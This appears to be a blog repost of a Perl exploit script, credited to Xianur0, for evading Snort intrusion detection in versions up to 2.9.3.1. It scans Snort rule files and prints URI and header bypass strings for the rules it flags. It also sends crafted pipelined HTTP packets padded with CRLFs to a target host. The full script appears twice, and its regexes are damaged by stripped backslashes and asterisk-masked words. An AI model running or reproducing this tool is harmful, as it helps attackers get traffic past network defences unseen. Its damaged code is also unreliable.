| Filename | Snort Multiple HTTP Bypass <= 2.9.3.1 Exploit |
| Permission | rw-r--r-- |
| Author | Unknown |
| Date and Time | 8:07 AM |
| Label | |
| Action |
#!/usr/bin/perl
use IO::Socket;
my $bypasscount=0;
die("Snort Multiple HTTP Bypass By Xianur0\n\nUse: snort.pl [URL]\nExample: snort.pl http://www.google.com/phpinfo.php\n\nUse: snort.pl [Path to snort rules]\nExample: snort.pl /home/xianur0/Descargas/snortrules-snapshot-2905/rules/\n") unless($ARGV[0]);
if(-f $ARGV[0] || -d $ARGV[0]){
print "[-] Analyzing Rules...\n\n";
checkrules($ARGV[0]);
} else {
tests();
}
sub hdump {
my $offset = 0;
my(@array,$format);
foreach my $data (unpack("a16"x(length($_[0])/16)."a*",$_[0])) {
my($len)=length($data);
if ($len == 16) {
@array = unpack('N4', $data);
$format="0x%08x (%05d) %08x %08x %08x %08x %s\n";
} else {
@array = unpack('C*', $data);
$_ = sprintf "%2.2x", $_ for @array;
push(@array, ' ') while $len++ < 16;
$format="0x%08x (%05d)" .
" %s%s%s%s %s%s%s%s %s%s%s%s %s%s%s%s %s\n";
}
$data =~ tr/0-37177-377/./;
printf $format,$offset,$offset,@array,$data;
$offset += 16;
}
}
sub snorthexdecode{
my $encoded=$_[0];
while($encoded =~ /|((s*([dw]{2})s*)+)|/) {
$cadena="\\|".$1."\\|";
$remplazo="";
my @caracteres=($cadena =~ /([dw]{2})/g);
foreach $caracter (@caracteres) {
$remplazo.=chr(hex($caracter));
}
$encoded=~s/$cadena/$remplazo/g;
}
return $encoded;
}
sub analizerules {
my $pathrules=$_[0];
if(-f $pathrules){
open RULE,$pathrules;
while(<RULE>) {
my $rule=$_;
$rule=~s/[rn]+$//g;
if($rule=~/http_uri;/ && $rule=~/*******:s*"([^"]+)"/i){
if(snorthexdecode($1)=~/([^"]*.w{1,4})(|3F||?)([^"]+)/){
my $bypass=$1."?junk&".$3;
print "[!] Vuln rule ".$pathrules.": ".$rule."n[!] URI Bypass: ".$bypass."nn";
$bypasscount++;
}
} elsif($rule=~/http_header;/ && $rule=~/*******:"([^"]+)"/){
if(snorthexdecode($1)=~/^([^:s]+:) (.+)$/){
my $bypass=$1."\t".$2;
print "[!] Vuln rule ".$pathrules.": ".$rule."\n[!] Header Bypass: ".$bypass."\n\n";
$bypasscount++;
}
}
}
} elsif(-d $pathrules) {
opendir (DIR, $pathrules);
while(readdir DIR) {
analizerules($pathrules."/".$_) if($_ !~/^.+$/);
}
}
}
sub checkrules {
my $checkpath=$_[0];
analizerules($checkpath);
print "[-] Bypassed rules: ".$bypasscount."\n";
}
sub tests {
my $host="";
my $port=80;
my $path="";
if($ARGV[0]=~/^http://([^/]+)(.*)$/){
$host=$1;
$path=$2;
if($host=~/^([^:]+):(d+)$/){
$host=$1;
$port=$2;
}
}
if($host!~/^[^:]+$/){
die('Invalid URL!');
}
print "[-]Target:\nHost: ".$host."\nPort: ".$port."\nPath: ".$path."\n\n";
if($path !~ "/(.+)"){
die('I need a path...');
$path=$1;
}
$encodedpath=$path;
$encodedpath=~s/([^/])/"%" . uc(sprintf("%2.2x",ord($1)))/eg;
print "[-] Encoded path: ".$encodedpath."\n";
@orders=("1st (CRLF)","2nd (+Pipelining)","3rd","4th","5th");
my $payload="POST / HTTP/1.1\r\n".
"*******-Type: application/x-www-form-urlencoded\r\n".
"*******-Length: 0\r\n".
"Connection: Keep-Alive\r\n".
"Host: ".$host.("\r\n"x12).
"POST / HTTP/1.1\r\n".
"Host: ".$host."\r\n".
"Connection: Keep-Alive\r\n".
"*******-Type: application/x-www-form-urlencoded\r\n".
"*******-Length: 30".("\r\n"x12).
"1234567890";
@packets = ("\n\n\n\nHEAD ".$path." HTTP/1.1\r\nHost: ".$host.":".$port."\r\nConnection: Close\r\n\r\n","");
$packets[1]=$payload.$packets[0];
$i=0;
foreach $packet (@packets){
my $sock = new IO::Socket::INET (
PeerAddr => $host,
PeerPort => $port,
Proto => 'tcp',
Reuse => 1,
);
die "Could not create socket: $!\n" unless $sock;
print "[-] Seding ".$orders[$i]." test...\n";
hdump($packet);
print $sock $packet;
print "\n[+] Headers:\n";
my $todo="";
while(<$sock>){
$todo.=$_;
}
close($sock);
hdump($todo);
$i++;
}
}
use IO::Socket;
my $bypasscount=0;
die("Snort Multiple HTTP Bypass By Xianur0\n\nUse: snort.pl [URL]\nExample: snort.pl http://www.google.com/phpinfo.php\n\nUse: snort.pl [Path to snort rules]\nExample: snort.pl /home/xianur0/Descargas/snortrules-snapshot-2905/rules/\n") unless($ARGV[0]);
if(-f $ARGV[0] || -d $ARGV[0]){
print "[-] Analyzing Rules...\n\n";
checkrules($ARGV[0]);
} else {
tests();
}
sub hdump {
my $offset = 0;
my(@array,$format);
foreach my $data (unpack("a16"x(length($_[0])/16)."a*",$_[0])) {
my($len)=length($data);
if ($len == 16) {
@array = unpack('N4', $data);
$format="0x%08x (%05d) %08x %08x %08x %08x %s\n";
} else {
@array = unpack('C*', $data);
$_ = sprintf "%2.2x", $_ for @array;
push(@array, ' ') while $len++ < 16;
$format="0x%08x (%05d)" .
" %s%s%s%s %s%s%s%s %s%s%s%s %s%s%s%s %s\n";
}
$data =~ tr/0-37177-377/./;
printf $format,$offset,$offset,@array,$data;
$offset += 16;
}
}
sub snorthexdecode{
my $encoded=$_[0];
while($encoded =~ /|((s*([dw]{2})s*)+)|/) {
$cadena="\\|".$1."\\|";
$remplazo="";
my @caracteres=($cadena =~ /([dw]{2})/g);
foreach $caracter (@caracteres) {
$remplazo.=chr(hex($caracter));
}
$encoded=~s/$cadena/$remplazo/g;
}
return $encoded;
}
sub analizerules {
my $pathrules=$_[0];
if(-f $pathrules){
open RULE,$pathrules;
while(<RULE>) {
my $rule=$_;
$rule=~s/[rn]+$//g;
if($rule=~/http_uri;/ && $rule=~/*******:s*"([^"]+)"/i){
if(snorthexdecode($1)=~/([^"]*.w{1,4})(|3F||?)([^"]+)/){
my $bypass=$1."?junk&".$3;
print "[!] Vuln rule ".$pathrules.": ".$rule."n[!] URI Bypass: ".$bypass."nn";
$bypasscount++;
}
} elsif($rule=~/http_header;/ && $rule=~/*******:"([^"]+)"/){
if(snorthexdecode($1)=~/^([^:s]+:) (.+)$/){
my $bypass=$1."\t".$2;
print "[!] Vuln rule ".$pathrules.": ".$rule."\n[!] Header Bypass: ".$bypass."\n\n";
$bypasscount++;
}
}
}
} elsif(-d $pathrules) {
opendir (DIR, $pathrules);
while(readdir DIR) {
analizerules($pathrules."/".$_) if($_ !~/^.+$/);
}
}
}
sub checkrules {
my $checkpath=$_[0];
analizerules($checkpath);
print "[-] Bypassed rules: ".$bypasscount."\n";
}
sub tests {
my $host="";
my $port=80;
my $path="";
if($ARGV[0]=~/^http://([^/]+)(.*)$/){
$host=$1;
$path=$2;
if($host=~/^([^:]+):(d+)$/){
$host=$1;
$port=$2;
}
}
if($host!~/^[^:]+$/){
die('Invalid URL!');
}
print "[-]Target:\nHost: ".$host."\nPort: ".$port."\nPath: ".$path."\n\n";
if($path !~ "/(.+)"){
die('I need a path...');
$path=$1;
}
$encodedpath=$path;
$encodedpath=~s/([^/])/"%" . uc(sprintf("%2.2x",ord($1)))/eg;
print "[-] Encoded path: ".$encodedpath."\n";
@orders=("1st (CRLF)","2nd (+Pipelining)","3rd","4th","5th");
my $payload="POST / HTTP/1.1\r\n".
"*******-Type: application/x-www-form-urlencoded\r\n".
"*******-Length: 0\r\n".
"Connection: Keep-Alive\r\n".
"Host: ".$host.("\r\n"x12).
"POST / HTTP/1.1\r\n".
"Host: ".$host."\r\n".
"Connection: Keep-Alive\r\n".
"*******-Type: application/x-www-form-urlencoded\r\n".
"*******-Length: 30".("\r\n"x12).
"1234567890";
@packets = ("\n\n\n\nHEAD ".$path." HTTP/1.1\r\nHost: ".$host.":".$port."\r\nConnection: Close\r\n\r\n","");
$packets[1]=$payload.$packets[0];
$i=0;
foreach $packet (@packets){
my $sock = new IO::Socket::INET (
PeerAddr => $host,
PeerPort => $port,
Proto => 'tcp',
Reuse => 1,
);
die "Could not create socket: $!\n" unless $sock;
print "[-] Seding ".$orders[$i]." test...\n";
hdump($packet);
print $sock $packet;
print "\n[+] Headers:\n";
my $todo="";
while(<$sock>){
$todo.=$_;
}
close($sock);
hdump($todo);
$i++;
}
}
0 comments:
Post a Comment